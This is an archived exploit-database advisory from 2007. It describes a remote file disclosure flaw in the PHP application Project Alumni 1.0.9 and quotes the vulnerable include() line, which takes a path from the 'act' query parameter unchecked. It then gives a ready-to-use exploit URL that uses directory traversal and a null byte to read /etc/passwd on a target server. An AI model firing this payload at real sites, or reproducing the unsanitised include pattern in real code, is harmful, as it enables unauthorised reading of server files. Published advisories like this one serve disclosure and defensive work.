exploit-db-mirror/platforms/php/webapps/4669.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

12 lines
359 B
Text
Executable file

project alumni 1.0.9 remote file disclosure vulnerability
download : https://sourceforge.net/projects/project-alumni/
vulnerable code on index.php
include($_SERVER['DOCUMENT_ROOT'] . "/pages/" . $_GET['act'] . ".page.inc.php");
exploit :
http://victim/path/index.php?act=../../../../../../etc/passwd%00
discovered by tomplixsee
# milw0rm.com [2007-11-27]